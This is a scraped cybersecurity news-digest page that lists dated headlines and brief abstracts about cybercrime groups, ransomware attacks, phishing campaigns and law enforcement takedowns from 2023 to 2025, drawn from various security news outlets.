Link Search Menu Expand Document
BSafes Library

Criminals

June 7, 2025

Paste.ee Abuse Uncovered: XWorm & AsyncRAT Infrastructure Full Text

Abstract Cybercriminals are exploiting the trusted text-sharing platform Paste.ee to deliver sophisticated malware strains, including XWorm and AsyncRAT. These campaigns leverage phishing emails and social engineering to distribute malicious payloads.

Hunt

June 2, 2025

Police takes down AVCheck site used by cybercriminals to scan malware Full Text

Abstract An international law enforcement operation has dismantled AVCheck, a major Counter Antivirus (CAV) service used by cybercriminals to test malware against commercial antivirus solutions.

Bleeping Computer

June 2, 2025

U.S. DoJ Seizes 4 Domains Supporting Cybercrime Crypting Services in Global Operation Full Text

Abstract On May 27, 2025, a coordinated international law enforcement operation led by the DoJ, in collaboration with Dutch and Finnish authorities, resulted in the seizure of three publicly disclosed domains—AvCheck[.]net, Cryptor[.]biz, and Crypt[.]guru.

The Hacker News

May 29, 2025

Cybercriminals camouflaging threats as AI tool installers Full Text

Abstract Cybercriminals are distributing malware disguised as AI tool installers, targeting users seeking AI solutions. Cisco Talos has identified three major threats: CyberLock ransomware, Lucky_Gh0$t ransomware, and a destructive malware named Numero.

Talos Intelligence

May 24, 2025

Global Takedown Disrupts Danabot Malware-as-a-Service Infrastructure Full Text

Abstract The FBI, DoD, and international partners dismantled Danabot’s infrastructure and identified key operators. Danabot was used to distribute malware like LockBit, Ursnif, and Zloader.

We Live Security

May 16, 2025

Ransomware gang INC claims recent attack on South African Airways - Comparitech Full Text

Abstract South African Airways (SAA) has confirmed a cyberattack on May 3, 2025, which temporarily disrupted its website, mobile app, and internal systems. The ransomware group INC has claimed responsibility, labeling the initial data leak as “Part 1."

Cyware

May 15, 2025

Defending Against UNC3944: Cybercrime Hardening Guidance from the Frontlines Full Text

Abstract A new wave of ransomware and extortion attacks is targeting the US retail sector, with threat intelligence suggesting the involvement of the advanced threat actor group Scattered Spider (UNC3944).

Google

May 15, 2025

The Internet’s Biggest-Ever Black Market Just Shut Down Amid a Telegram Purge Full Text

Abstract In a major disruption to global cybercrime infrastructure, the notorious Haowang Guarantee (formerly Huione Guarantee) black market has been shut down following Telegram’s enforcement action.

Wired

May 10, 2025

Ransomware gang says it hacked the Sheriff of Hamilton County, TN Full Text

Abstract The Qilin ransomware gang claimed responsibility for a cyberattack on the Hamilton County Sheriff’s Office in Chattanooga, Tennessee, on April 14, 2025. The sheriff’s office stated that the attackers demanded a $300,000 ransom, which was not paid.

CompariTech

May 9, 2025

Kickidler employee monitoring software abused in ransomware attacks Full Text

Abstract Ransomware groups Qilin and Hunters International are abusing Kickidler, a legitimate employee monitoring tool used by over 5,000 organizations across 60 countries, to conduct stealthy reconnaissance and credential harvesting.

Bleeping Computer

May 7, 2025

Digital welfare fraud: ALTSRUS syndicate exploits the financially vulnerable Full Text

Abstract A newly uncovered fraud syndicate named ALTSRUS is exploiting vulnerable segments of the digital economy by stealing and reselling accounts tied to Electronic Benefit Transfer (EBT), pharmacy prescriptions, and consumer rewards programs.

Help Net Security

May 5, 2025

Rhysida Ransomware gang claims the hack of the Government of Peru Full Text

Abstract The Rhysida ransomware group has claimed responsibility for breaching the Government of Peru’s official digital platform, Gob.pe. The group published images of multiple documents allegedly stolen from the platform on May 2, 2025.

Security Affairs

April 28, 2025

JokerOTP Dismantled After 28,000 Phishing Attacks, 2 Arrested Full Text

Abstract Two individuals have been arrested in a joint international operation dismantling JokerOTP, a sophisticated phishing tool used to intercept 2FA codes and steal over £7.5 million.

HackRead

April 25, 2025

How NFC-Enabled POS Terminals Facilitate Cybercriminal Money Laundering Chains Full Text

Abstract Chinese cybercriminals are especially active in NFC-enabled fraud and are known for their well-established money laundering chains across multiple continents. They arrange for an NFC-enabled POS terminal and a merchant account linked to it.

RESecurity

April 21, 2025

SheByte PaaS Launches Subscription Service for Cybercriminals Full Text

Abstract Launched in June 2024, SheByte has rapidly gained traction among cybercriminals by offering customizable phishing kits and a subscription model, signaling a durable presence in the threat landscape.

GBHackers

April 18, 2025

Look out! CapCut copycats are on the prowl Full Text

Abstract Cybercriminals are exploiting the popularity of AI-powered content creation tools by deploying fake websites that impersonate platforms like CapCut, Adobe Express, and Canva.

WeLive Security

April 10, 2025

Moroccan Cybercrime Group Atlas Lion Hiding in Plain Sight During Attacks on Retailers Full Text

Abstract The Atlas Lion group used stolen credentials to enroll its own virtual machines (VMs) into an organization’s cloud domain, according to researchers at cybersecurity firm Expel.

The Record

April 8, 2025

EncryptHub’s Dual Life Between Cybercrime and Windows Bug Bounty Research Uncovered Full Text

Abstract A new report by Outpost24 researchers linked the EncryptHub threat actor with SkorikARI, the account that reported CVE-2025-24061 and CVE-2025-24071, after they allegedly infected themselves and exposed their credentials.

Bleeping Computer

April 5, 2025

Smishing Triad is Now Targeting Toll Payment Services in a Massive Fraud Campaign Expansion Full Text

Abstract The Smishing Triad group has been linked to a surge in smishing campaigns targeting the U.S. and the U.K. The fraudulent text messages claim unpaid toll bills or payment requests related to toll services like FasTrak, E-ZPass, and I-Pass.

ReSecurity

April 5, 2025

Hunters International Dumps Ransomware, Goes Full-on Extortion Full Text

Abstract The decision appears to come in the wake of international law enforcement operations over the past two years with names like Endgame, Morpheus, Cronos, and Magnus that disrupted the operations of cybercriminal groups.

Security Boulevard

March 28, 2025

Hackers Repurpose RansomHub’s EDRKillShifter in Medusa, BianLian, and Play Attacks Full Text

Abstract A new analysis has uncovered connections between affiliates of RansomHub and other ransomware groups like Medusa, BianLian, and Play. The connection stems from the use of EDRKillShifter to disable endpoint security software, according to ESET.

The Hacker News

March 27, 2025

BlackLock Ransomware Operation Disrupted by Cybersecurity Firm Full Text

Abstract Resecurity discovered a local file inclusion flaw in the data leak site used by BlackLock Ransomware, allowing them to uncover clearnet IP addresses and other details about the cybercriminals' network, aiding in the investigation and disruption.

Security Affairs

March 26, 2025

Researchers Uncover Nearly 200 Unique C2 Domains Linked to Raspberry Robin Access Broker Full Text

Abstract "Raspberry Robin (also known as Roshtyak or Storm-0856) is a complex and evolving threat actor that provides initial access broker (IAB) services to numerous criminal groups, many of which have connections to Russia," Silent Push said in a report.

The Hacker News

March 25, 2025

Over 300 Arrested in International Crackdown on Cyber Scams Full Text

Abstract Law enforcement agencies in seven African countries arrested over 300 suspected cybercriminals involved in mobile banking, investment and messaging app scams, according to a statement on Monday by Interpol.

The Record

March 20, 2025

Leaked Black Basta Chats Suggest Russian Officials Aided Leader’s Escape from Armenia Full Text

Abstract The recently leaked trove of internal chat logs among members of the Black Basta ransomware operation has revealed possible connections between the e-crime gang and Russian authorities.

The Hacker News

March 15, 2025

Crypto Traps, Fake Giveaways Trick Victims During Ramadan Full Text

Abstract Cybercriminals use deceptive tactics to target individuals and organizations during Ramadan, employing fraudulent donation requests, fake giveaways, and cryptocurrency schemes.

Security Online

March 14, 2025

Zservers: Bulletproof Hosting for Online Crime Full Text

Abstract Zservers has operated in the open for more than a dozen years, facilitating connectivity for numerous ransomware affiliates and brands including LockBit, BianLian, Hunters International, and other fraudsters.

Intel 471

March 12, 2025

Researchers Investigate Potential Links Between Belsen and ZeroSevenGroup Full Text

Abstract The Belsen Group surfaced in January 2025, leaking Fortinet data and selling network access, while ZeroSevenGroup had been active earlier, breaching companies and monetizing stolen data.

Kela

March 10, 2025

Microsoft Warns of North Korean Hackers Joining Qilin Ransomware Gang Full Text

Abstract "Moonstone Sleet has previously exclusively deployed their own custom ransomware in their attacks, and this represents the first instance they are deploying ransomware developed by a RaaS operator," Microsoft researchers said.

Bleeping Computer

March 5, 2025

Update: North Korean Hackers Finish Initial Laundering Stage After Stealing Over $1 Billion From Bybit Full Text

Abstract Experts from multiple blockchain security companies said Monday that the hackers were able to move all of the stolen ETH coins to new addresses — the first step taken before the funds can be laundered further.

The Record

March 5, 2025

North Korean Fake IT Workers Leverage GitHub to Build Personas Full Text

Abstract Researchers tracked a global network of IT workers posing as Vietnamese, Japanese, and Singaporean nationals attempting to obtain employment in remote engineering and full-stack blockchain developer positions in Japan and the US.

Infosecurity Magazine

February 20, 2025

BlackLock Becomes the World’s Fastest Rising Ransomware Operator Full Text

Abstract BlackLock actively recruits key players, known as traffers, to support the early stages of ransomware attacks. These individuals drive malicious traffic, steer victims to harmful content, and help establish initial access for campaigns.

Reliaquest

February 11, 2025

Police Dismantles 8Base Ransomware Gang Under Operation Phobos Aetor Full Text

Abstract The police arrested four European citizens in Phuket, Thailand, who are suspected of having stolen over $16 million through ransomware attacks affecting over 1,000 victims worldwide.

Security Affairs

February 6, 2025

XE Group Goes From Credit Card Skimming to Exploiting Zero-Days Full Text

Abstract A Vietnamese cybercrime group, XE Group, has changed its tactics from focusing on credit card skimming to exploiting zero-day vulnerabilities in a widely used software called VeraCore. This software is used to manage orders and operations.

Intezer

February 6, 2025

TAG-124 Traffic Distribution System Powers Multiple Malware Campaigns Full Text

Abstract The TDS network comprises compromised WordPress websites, actor-controlled payload servers, and a sophisticated management system, allowing cybercriminals to dynamically route traffic to malicious content while evading detection.

Security Online

February 5, 2025

Cybercriminals Aim to Lure Traitorous Insiders via Ransom Notes Full Text

Abstract Ransomware actors are now using a new tactic by offering individuals millions of dollars to betray their employers and share confidential company information. These actors include groups like Sarcoma and DoNex.

Dark Reading

January 31, 2025

FBI Seizes Cracked.io, Nulled.to Hacking Forums in Operation Talent Full Text

Abstract The FBI has seized the domains for the infamous Cracked.io and Nulled.to hacking forums, which are known for their focus on cybercrime, password theft, cracking, and credential stuffing attacks.

Bleeping Computer

January 14, 2025

Attackers are encrypting AWS S3 data without using ransomware Full Text

Abstract A ransomware gang dubbed Codefinger is encrypting data stored in target organizations’ AWS S3 buckets with AWS’s server-side encryption option with customer-provided keys (SSE-C), and asking for money to hand over the key they used.

Help Net Security

December 24, 2024

Major Biometric Data Farming Operation Uncovered Full Text

Abstract Security researchers have urged customer-facing businesses to improve their verification checks after discovering a large-scale identity farming operation on the dark web.

Infosecurity Magazine

December 17, 2024

Crypted Hearts: Exposing the HeartCrypt Packer-as-a-Service Operation Full Text

Abstract The majority of HeartCrypt customers are malware operators using families such as LummaStealer, Remcos, and Rhadamanthys. However, researchers also observed payloads from a wide variety of other crimeware families.

Palo Alto Networks

December 14, 2024

Cybercriminal Marketplace Rydox Seized in International Law Enforcement Operation Full Text

Abstract The operation was carried out by the FBI’s Pittsburgh Office, Albania’s Special Anti-Corruption Body (SPAK) and its National Bureau of Investigation (BKH), the Kosovo Special Prosecution Office, the Kosovo Police, and the Royal Malaysian Police.

Cyber Scoop

December 10, 2024

Cybercrime gang arrested after turning Airbnbs into fraud centers Full Text

Abstract According to the Dutch police, the fraudsters rent Airbnb properties and luxury apartments to use as temporary call centers from where they launched phishing campaigns. They contacted victims across Europe using email, SMS, or WhatsApp messages.

Bleeping Computer

December 6, 2024

Europol Shuts Down Manson Market Fraud Marketplace, Seizes 50 Servers Full Text

Abstract Manson Market ("manson-market[.]pw") is believed to have launched in 2022 as a way to peddle sensitive information that was illegally obtained from victims as part of phishing and vishing (voice phishing) schemes.

The Hacker News

December 5, 2024

Criminals Use Generative Artificial Intelligence to Facilitate Financial Fraud Full Text

Abstract Attackers use AI-generated text to appear believable to a reader to push social engineering, spear phishing, and financial fraud schemes such as romance, investment, and other confidence schemes or to hide common indicators of fraud schemes.

IC3

December 5, 2024

Authorities Shut Down Crimenetwork, the Germany’s Largest Crime Marketplace Full Text

Abstract The operation was carried out by Public Prosecutor’s Office in Frankfurt am Main, the Central Office for Combating Cybercrime (ZIT), and the Federal Criminal Police Office (BKA).

Security Affairs

December 3, 2024

Korea Arrests CEO for Adding DDoS Feature to Satellite Receivers Full Text

Abstract South Korean police have arrested a CEO and five employees for manufacturing over 240,000 satellite receivers pre-loaded or later updated to include DDoS attack functionality at a purchaser's request.

Bleeping Computer

December 3, 2024

Ransomware suspect Wazawaka reportedly arrested by Russia Full Text

Abstract Russian authorities have charged a high-profile hacker for creating malware used to blackmail commercial organizations, the Russian interior ministry said in a statement late last week.

The Record

December 2, 2024

INTERPOL Arrests 5,500 in Global Cybercrime Crackdown, Seizes Over $400 Million Full Text

Abstract The coordinated exercise saw the participation of authorities from 40 countries, territories, and regions as part of the latest wave of Operation HAECHI-V, which took place between July and November 2024, INTERPOL said.

The Hacker News

November 26, 2024

Cybercriminals Turn to Pen Testers to Test Ransomware Efficiency Full Text

Abstract Any good developer knows that software needs to be tested before deploying in production environments. This is also true for ransomware gangs. They want to ensure that their ransomware can be deployed successfully against organizations.

Help Net Security

November 20, 2024

Cybercriminals Exploit Weekend Lull to Launch Ransomware Attacks Full Text

Abstract Ransomware gangs are increasingly targeting weekends and holidays, when cybersecurity teams are typically less staffed, according to a new report. 86% of study participants who experienced a ransomware attack were targeted on a weekend or holiday.

Infosecurity Magazine

November 19, 2024

Ransomware Gangs on Recruitment Drive for Pen Testers Full Text

Abstract Threat actors are actively seeing pen testers to join various ransomware affiliate programs, including Apos, Lynx and Rabbit Hole. Now, ransomware gangs are hiring people with the same level of expertise.

Infosecurity Magazine

November 19, 2024

Ransomware gang Akira leaks unprecedented number of victims’ data in one day Full Text

Abstract Akira, a ransomware-as-a-service gang with a growing profile in the cybercrime underworld, has published a record number of new victims to its darknet leak site in a single day, and more apparently still being added.

The Record

November 7, 2024

Suspect Behind Snowflake Data-Theft Attacks Arrested in Canada Full Text

Abstract The investigations by Snowflake, Mandiant, and CrowdStrike revealed that an attacker known as UNC5537 utilized stolen customer credentials to target organizations that lacked multi-factor authentication protection on their Snowflake accounts.

Bleeping Computer

November 7, 2024

Massive Nigerian Cybercrime Bust Sees 130 Arrested Full Text

Abstract In a massive law enforcement operation, the Nigeria Police Force (NPF) has arrested 130 individuals over cybercrime accusations. Prince Olumuyiwa Adejobi, the NPF public relations officer, announced the arrests on X on November 3.

Infosecurity Magazine

October 30, 2024

Redline, Meta Infostealer Malware Operations Seized by Police Full Text

Abstract The Dutch National Police, in collaboration with the FBI and other international agencies, have successfully gained full access to the servers used by the Redline and Meta infostealers.

Bleeping Computer

October 17, 2024

Brazil’s Polícia Federal Arrested the Notorious Hacker USDoD Full Text

Abstract Brazil's Polícia Federal has arrested hacker USDoD, known for breaches of National Public Data and InfraGard portals. CrowdStrike identified USDoD as Luan BG, a 33-year-old Brazilian man from Minas Gerais.

Security Affairs

October 17, 2024

Sri Lankan Police Arrest Over 200 Chinese Scammers Full Text

Abstract Sri Lankan authorities have arrested over 200 Chinese nationals for overstaying their visitor visas and participating in financial scams targeting victims in Asia. Raids led to the arrest of cybercriminals conducting pig-butchering scams.

Healthcare Infosecurity

October 14, 2024

Bohemia and Cannabia Dark Web Markets Taken Down After Joint Police Operation Full Text

Abstract The Dutch police have dismantled Bohemia and Cannabia, considered the world's largest dark web market for illegal goods, drugs, and cybercrime. This action resulted from a joint investigation involving Ireland, the UK, and the US.

The Hacker News

September 19, 2024

Marko Polo Cybercrime Gang Targets Cryptocurrency Users, Influencers With Scams Full Text

Abstract The group primarily focuses on online gaming personalities, cryptocurrency influencers, and technology professionals, enticing them with fake job opportunities on social media that lead to downloading malicious software.

The Record

September 12, 2024

New RansomHub Attack Uses TDSSKiller and LaZagne, Disables EDR Full Text

Abstract The RansomHub ransomware gang has been found using Kaspersky's TDSSKiller tool to disable EDR software on target systems, allowing for credential harvesting with LaZagne.

Threat Down

September 10, 2024

Poland Dismantles Cyber Sabotage Group Linked to Russia, Belarus Full Text

Abstract Poland has dismantled a cyber sabotage group with links to Russia and Belarus. The group attempted to disrupt the country through cyberattacks, extorting information from local government agencies and state companies related to security matters.

The Record

September 3, 2024

Researchers Link ManticoraLoader Malware to Ares Malware Developer Full Text

Abstract Researchers have traced the new ManticoraLoader malware-as-a-service (MaaS) to the cybercriminal group 'DarkBLUP,' previously associated with distributing AresLoader and AiDLocker ransomware from the DeadXInject group.

The Cyber Express

August 30, 2024

Cybercriminals Capitalize on Travel Industry’s Peak Season Full Text

Abstract Cequence Security found that cyberattacks against the travel industry surge during holidays, with 91% of severe vulnerabilities in the top 10 travel and hospitality sites enabling man-in-the-middle attacks.

Help Net Security

August 29, 2024

Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations Full Text

Abstract The Pioneer Kitten attackers are monetizing their access to compromised organizations' networks by selling domain admin credentials and full domain control privileges on cybercrime marketplaces.

CISA

August 24, 2024

Greasy Opal’s CAPTCHA Solver Still Serving Cybercrime After 16 Years Full Text

Abstract Greasy Opal, a well-known developer, has been aiding cybercriminals for 16 years by offering a tool that can solve CAPTCHAs automatically on a large scale, bypassing security measures.

Bleeping Computer

August 19, 2024

Mad Liberator Gang Uses Fake Windows Update Screen to Hide Data Theft Full Text

Abstract A new cybercrime group named Mad Liberator has been identified by the Sophos X-Ops Incident Response team for targeting AnyDesk users. This ransomware group is using a fake Microsoft Windows update screen to hide their data exfiltration activities.

Bleeping Computer

August 19, 2024

Researchers Uncover New Infrastructure Tied to FIN7 Cybercrime Group Full Text

Abstract Researchers have uncovered new infrastructure connected to the financially motivated threat actor FIN7. The analysis reveals communications inbound to FIN7 infrastructure from IP addresses assigned to Post Ltd in Russia and SmartApe in Estonia.

The Hacker News

August 15, 2024

Black Basta Ransomware Gang Linked to a Malware Campaign Full Text

Abstract The attacks, detected on June 20, 2024, show threat actors using various tools like AnyDesk and AntiSpam.exe to harvest credentials. They also deploy payloads like Golang HTTP beacons and Socks proxy beacons.

Security Affairs

August 14, 2024

Prolific Malvertising Scammer Arrested and Extradited to US to Face Charges Full Text

Abstract Maxim Silnikau, a Belarusian-Ukrainian cybercriminal dubbed one of the most prolific Russian-speaking hackers by the UK's NCA, has been arrested in Spain and extradited to the US.

The Record

August 14, 2024

Feds Seize Radar/Dispossessor Ransomware Gang Servers in US and Europe Full Text

Abstract Federal authorities have seized servers belonging to the Radar/Dispossessor ransomware gang in the U.S. and Europe. The FBI dismantled dozens of servers linked to the group, which is believed to have ties to the LockBit ransomware enterprise.

The Record

August 9, 2024

US Offers $10 Million for Information on Iranian Hackers Behind CyberAv3ngers Water Utility Attacks Full Text

Abstract The U.S. State Department has offered a $10 million reward for information on six Iranian government hackers who allegedly targeted U.S. water utilities last fall. These individuals were previously sanctioned for targeting critical infrastructure.

The Record

August 2, 2024

Suspects in ‘Russian Coms’ Spoofing Service Arrested in London, as NCA Announces Takedown Full Text

Abstract The caller ID spoofing service, which was established in 2021, is believed to have caused financial losses in the tens of millions and had around 170,000 victims in Britain.

The Record

July 31, 2024

Researchers Study Evolution of Ransomware Gang UNC4393’s Campaigns After Qakbot Takedown Full Text

Abstract Initially relying on Qakbot botnet infections, UNC4393 now uses custom malware and diverse access techniques after the crackdown on Qakbot. They have quick reconnaissance and encryption objectives, with a median time of 42 hours to ransomware.

The Cyber Express

July 22, 2024

UK Arrests Suspected Scattered Spider Hacker Linked to MGM Attack Full Text

Abstract A 17-year-old boy from Walsall has been arrested by UK police for his involvement in the 2023 MGM Resorts ransomware attack, connected to the Scattered Spider hacking group. The arrest was made with assistance from the NCA and the FBI.

Bleeping Computer

July 12, 2024

The Stark Truth Behind the Resurgence of Russia’s FIN7 Full Text

Abstract FIN7, a cybercrime group responsible for billions in losses, was dismantled by U.S. authorities in 2023. However, they resurfaced in 2024 with Stark Industries Solutions, hosting thousands of fake websites mimicking renowned companies.

Krebs On Security

July 12, 2024

Ransomware Gangs Invest in Custom Data Stealing Malware Full Text

Abstract Ransomware gangs are now creating custom data-stealing malware instead of just encrypting files. Mature crime organizations are investing in bespoke data theft tools, according to a Cisco Talos report on the top 14 ransomware groups.

The Register

July 10, 2024 – Phishing

Regional Transport Office Themed Phishing Campaign Targets Android Users In India Full Text

Abstract Phishing messages impersonating the Regional Transport Office have been circulating since 2024, claiming traffic violations and prompting users to download a malicious APK named "VAHAN PARIVAHAN.apk".

Cyble As CISOs Grapple with the C-Suite, Job Satisfaction Takes a Hit Full Text

Abstract Research shows that 75% of CISOs are considering a job change due to various challenges and pressures. CISOs often face accountability for cyber incidents and compliance failures, leading to discontent.

Cybersecurity Dive

August 31, 2023

Unmasking Trickbot, One of the World’s Top Cybercrime Gangs Full Text

Abstract Maksim Sergeevich Galochkin, a member of the Russian cybercrime syndicate Trickbot, has been identified by cybercrime researchers. The identification of Galochkin comes after a comprehensive investigation into leaked data from the Trickbot group.

Cyware

August 30, 2023

Pay Our Ransom Instead of GDPR Fine, Cybercrime Gang Tells Its Targets Full Text

Abstract The hackers behind Ransomed are probably linked to other data leak websites like BreachForums and Exposed, Flashpot said. Some of these sites have shut down due to money problems or poor management, the researchers said.

Cyware

August 29, 2023

Web Control, Crime Patrol or Real Pawns in Cybercrime Full Text

Abstract A group of young employees in Hyderabad ran a sophisticated scam using VOIP to target unsuspecting people in the U.S. and trick them into buying gift cards, which were then converted into cryptocurrency and Indian Rupees.

Cyware

August 26, 2023

Adversary On The Defense: ANTIBOT.PW Full Text

Abstract The Antibot web traffic filtering service, originally a GitHub project, has evolved into a commercial platform for malicious actors, offering features like cloaking to evade analysis and prolong phishing and malware campaigns.

Cyware

August 26, 2023

Update: Prospect Medical Stolen Data Listed for Sale by Emerging Ransomware Group Full Text

Abstract The Rhysida ransomware group claimed responsibility for a ransomware attack against Prospect Medical Holdings that forced multiple hospital closures earlier this month and continues to impact operations.

Cyware

August 22, 2023

MOVEit Attack Spree Makes Clop This Summer’s Most-Prolific Ransomware Group Full Text

Abstract Clop was responsible for one-third of all ransomware attacks in July, positioning the financially-motivated threat actor to become the most prolific ransomware threat actor this summer, according to multiple threat intelligence reports.

Cyware

August 22, 2023

Akira ransomware gang spotted targeting Cisco VPN products to hack organizations Full Text

Abstract The Akira ransomware gang targets Cisco VPN products to gain initial access to corporate networks and steal their data. The Akira ransomware has been active since March 2023, the threat actors behind the malware claim to have already hacked multiple...

Security Affairs

August 22, 2023

Snatch gang claims the hack of the Department of Defence South Africa Full Text

Abstract Snatch gang claims the hack of the Department of Defence South Africa and added the military organization to its leak site. The Snatch ransomware group added the Department of Defence South Africa to its data leak site. The mission of the Department...

Security Affairs

August 21, 2023

Researchers Uncover Real Identity of CypherRAT and CraxsRAT Malware Developer Full Text

Abstract The CraxsRAT builder, Cyfirma says, generates highly obfuscated packages, allowing threat actors to customize the contents based on the type of attack they are preparing, including with WebView page injections.

Cyware

August 21, 2023

Australia’s .AU Domain Administrator Denies Data Breach After Ransomware Posting Full Text

Abstract The organization that manages Australia’s internet domain .au denied that it was affected by a data breach on Friday after a ransomware gang added it to their list of victims.

Cyware

August 19, 2023

Ransomware Gang Threatens Raleigh Housing Authority Months After Devastating Attack Full Text

Abstract A ransomware gang has started posting sensitive personal information connected to a devastating attack on the Raleigh Housing Authority (RHA) that disrupted the organization for weeks in May.

Cyware

August 19, 2023

Update: Man Arrested in Northern Ireland Police Data Leak Full Text

Abstract The unnamed man was questioned by detectives who were said to be "investigating criminality linked to last week's freedom of information data breach," but has now been released on bail to allow for further inquiries, the PSNI stated.

Cyware

August 18, 2023

14 Suspected Cybercriminals Arrested Across Africa in Coordinated Crackdown Full Text

Abstract A coordinated law enforcement operation across 25 African countries has led to the arrest of 14 suspected cybercriminals, INTERPOL  announced  Friday. The exercise, conducted in partnership with AFRIPOL, enabled investigators to identify 20,674 cyber networks that were linked to financial losses of more than $40 million. "The four-month Africa Cyber Surge II operation was launched in April 2023 and focused on identifying cybercriminals and compromised infrastructure," the agency said. As part of the operation, three suspects were arrested in Cameroon in connection with an online scam involving the fraudulent sale of works of art worth $850,000. Another suspect was arrested in Nigeria for defrauding a Gambian victim. Also arrested were two money mules linked to scams initiated through messaging platforms. The cyber networks comprised 3,786 command-and-control (C2) servers, 14,134 victim IP addresses tied to data stealer infections, 1,415 phishing links and domains, 939

The Hacker News

August 17, 2023

Cybercriminals Selling SMS Bomber Attack Tools on Underground Forums Full Text

Abstract The underground market for SMS Bomber services is thriving, with various platforms offering attack services for a fee, highlighting the need for increased security measures in registration pages and APIs.

Cyware

August 15, 2023

Cybercriminals Abusing Cloudflare R2 for Hosting Phishing Pages, Experts Warn Full Text

Abstract Threat actors' use of Cloudflare R2 to host phishing pages has witnessed a 61-fold increase over the past six months. "The majority of the phishing campaigns target Microsoft login credentials, although there are some pages targeting Adobe, Dropbox, and other cloud apps," Netskope security researcher Jan Michael  said . Cloudflare R2 , analogous to Amazon Web Service S3, Google Cloud Storage, and Azure Blob Storage, is a data storage service for the cloud. The development comes as the total number of cloud apps from which malware downloads originate has  increased to 167 , with Microsoft OneDrive, Squarespace, GitHub, SharePoint, and Weebly taking the top five spots. The phishing campaigns identified by Netskope not only abuse Cloudflare R2 to distribute static phishing pages, but also leverage the company's  Turnstile  offering, a CAPTCHA replacement, to place such pages behind anti-bot barriers to evade detection. In doing so, it prevents online scanners like

The Hacker News

August 15, 2023

Credentials for cybercrime forums found on roughly 120K computers infected with info stealers Full Text

Abstract Researchers discovered credentials associated with cybercrime forums on roughly 120,000 computers infected with information stealers. Threat intelligence firm Hudson Rock has discovered credentials associated with cybercrime forums on roughly 120,000...

Security Affairs

August 15, 2023

Monti Ransomware Returns with New Linux Variant and Enhanced Evasion Tactics Full Text

Abstract The threat actors behind the Monti ransomware have resurfaced after a two-month break with a new Linux version of the encryptor in its attacks targeting government and legal sectors. Monti  emerged  in June 2022, weeks after the Conti ransomware group shut down its operations, deliberately imitating the tactics and tools associated with the latter, including its leaked source code. Not anymore. The new version, per Trend Micro, is a departure of sorts, exhibiting significant changes from its other Linux-based predecessors. "Unlike the earlier variant, which is primarily based on the leaked Conti source code, this new version employs a different encryptor with additional distinct behaviors," Trend Micro researchers Nathaniel Morales and Joshua Paul Ignacio  said . A  BinDiff analysis  has revealed that while the older iterations had a 99% similarity rate with Conti, the latest version has only a 29% similarity rate, suggesting an overhaul. Some of the crucial changes in

The Hacker News

August 15, 2023

Over 120,000 Computers Compromised by Info Stealers Linked to Users of Cybercrime Forums Full Text

Abstract A "staggering" 120,000 computers infected by stealer malware have credentials associated with cybercrime forums, many of them belonging to malicious actors. The  findings  come from Hudson Rock, which analyzed data collected from computers compromised between 2018 to 2023. "Hackers around the world infect computers opportunistically by promoting results for fake software or through YouTube tutorials directing victims to download infected software," Hudson Rock CTO Alon Gal told The Hacker News. "It is not a case of the threat actor infecting his own computer, it is that out of the 14,500,000 computers we have in our cybercrime database, some of them happen to be hackers that  accidentally got infected ." Data retrieved from machines compromised by stealer malware is often expansive and wide-ranging, enabling the real-world identities of hackers to be discovered based on indicators such as credentials, addresses, phone numbers, computer names, and IP a

The Hacker News

August 12, 2023

Honor Among Cybercriminals? Why a Canadian Firm Paid Ransom Full Text

Abstract A nonprofit firm that administers government dental programs in Canada is notifying nearly 1.5 million individuals that their data, including banking information for some, was compromised in a ransomware incident last month.

Cyware

August 12, 2023

Lolek Bulletproof Hosting Servers Seized, 5 Key Operators Arrested Full Text

Abstract European and U.S. law enforcement agencies have announced the dismantling of a bulletproof hosting service provider called  Lolek Hosted , which cybercriminals have used to launch cyber-attacks across the globe. "Five of its administrators were arrested, and all of its servers seized, rendering LolekHosted.net no longer available," Europol  said  in a statement. "The service facilitated the distribution of information-stealing malware, and also the launching of DDoS (distributed denial of service) attacks, fictitious online shops, botnet server management, and distribution of spam messages worldwide," it added. Polish authorities, who made the arrests,  said  three other detainees have been subjected to preventive measures in the form of police supervision, bail, and a ban on leaving the country. Alongside the arrests, hundreds of servers containing terabytes of data, computer equipment, and mobile phones have been confiscated. The seizure, carried out on Augu

The Hacker News

August 11, 2023

California City Investigating Data Theft After Ransomware Group’s Claims Full Text

Abstract The LockBit gang added 15 victims to its leak site on Wednesday including El Cerrito, which is home to more than 25,000 residents and is about 10 minutes north of Oakland.

Cyware

August 10, 2023

IRS Confirms Takedown of Bulletproof Hosting Provider Lolek Full Text

Abstract A popular bulletproof hosting platform was taken down by authorities in the U.S. and Poland this week, marking the latest effort to limit the anonymous access cybercriminals have to critical tools.

Cyware

August 10, 2023

Interpol Busts Phishing-as-a-Service Platform ‘16Shop,’ Leading to 3 Arrests Full Text

Abstract Interpol has announced the takedown of a phishing-as-a-service (PhaaS) platform called 16Shop, in addition to the arrests of three individuals in Indonesia and Japan. 16Shop specialized in the sales of phishing kits that other cybercriminals can purchase to mount phishing attacks on a large scale, ultimately facilitating the theft of credentials and payment details from users of popular services such as Apple, PayPal, American Express, Amazon, and Cash App, among others. "Victims typically receive an email with a pdf file or link that redirects to a site requesting the victims' credit card or other personally identifiable information," Interpol  said . "This information is then stolen and used to extract money from the victims." No less than 70,000 users across 43 countries are estimated to have been compromised via services offered on 16Shop. The law enforcement operation has also led to the arrest of the site's administrator, a 21-year-old Indonesian

The Hacker News

August 09, 2023

New Report Exposes Vice Society’s Collaboration with Rhysida Ransomware Full Text

Abstract Tactical similarities have been unearthed between the double extortion ransomware group known as Rhysida and Vice Society , including in their targeting of education and healthcare sectors. "As Vice Society was observed deploying a variety of commodity ransomware payloads, this link does not suggest that Rhysida is exclusively used by Vice Society, but shows with at least medium confidence that Vice Society operators are now using Rhysida ransomware," Check Point  said  in a new report. Vice Society , tracked by Microsoft under the name Storm-0832, has a  pattern  of employing already existing ransomware binaries that are sold on criminal forums to pull off their attacks. The financially motivated gang has also been observed resorting to pure extortion-themed attacks wherein the data is exfiltrated without encrypting them. First observed in May 2023, the  Rhysida  ransomware group is known to rely on phishing attacks and Cobalt Strike to breach targets' networks and

The Hacker News

August 8, 2023

Nigerian Man Admits to $1.3M Business Email Compromise Scam Full Text

Abstract A Nigerian national pleaded guilty to participating in a BEC scheme to steal $1.25m from a Boston investment firm. The scam involved using malware and a spoofed domain name to trick the firm into transferring money to attacker-controlled accounts.

Cyware

August 7, 2023

Cl0p Ransomware Gang Revises its Extortion Strategy Full Text

